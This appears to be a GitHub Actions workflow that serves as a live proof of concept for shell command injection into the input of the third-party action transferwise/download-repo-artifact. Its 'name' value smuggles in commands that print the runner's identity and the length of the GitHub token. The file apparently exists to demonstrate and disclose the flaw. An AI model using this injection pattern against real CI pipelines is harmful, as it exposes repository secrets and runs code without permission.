name: GHA Injection Live PoC
on: [push]

jobs:
  poc:
    runs-on: ubuntu-latest
    steps:
      - name: Call vulnerable action with injected input
        uses: transferwise/download-repo-artifact@main
        with:
          name: 'x" || true; id; whoami; echo "TOKEN_LENGTH=${#GITHUB_TOKEN}'
          path: '.'
        continue-on-error: true
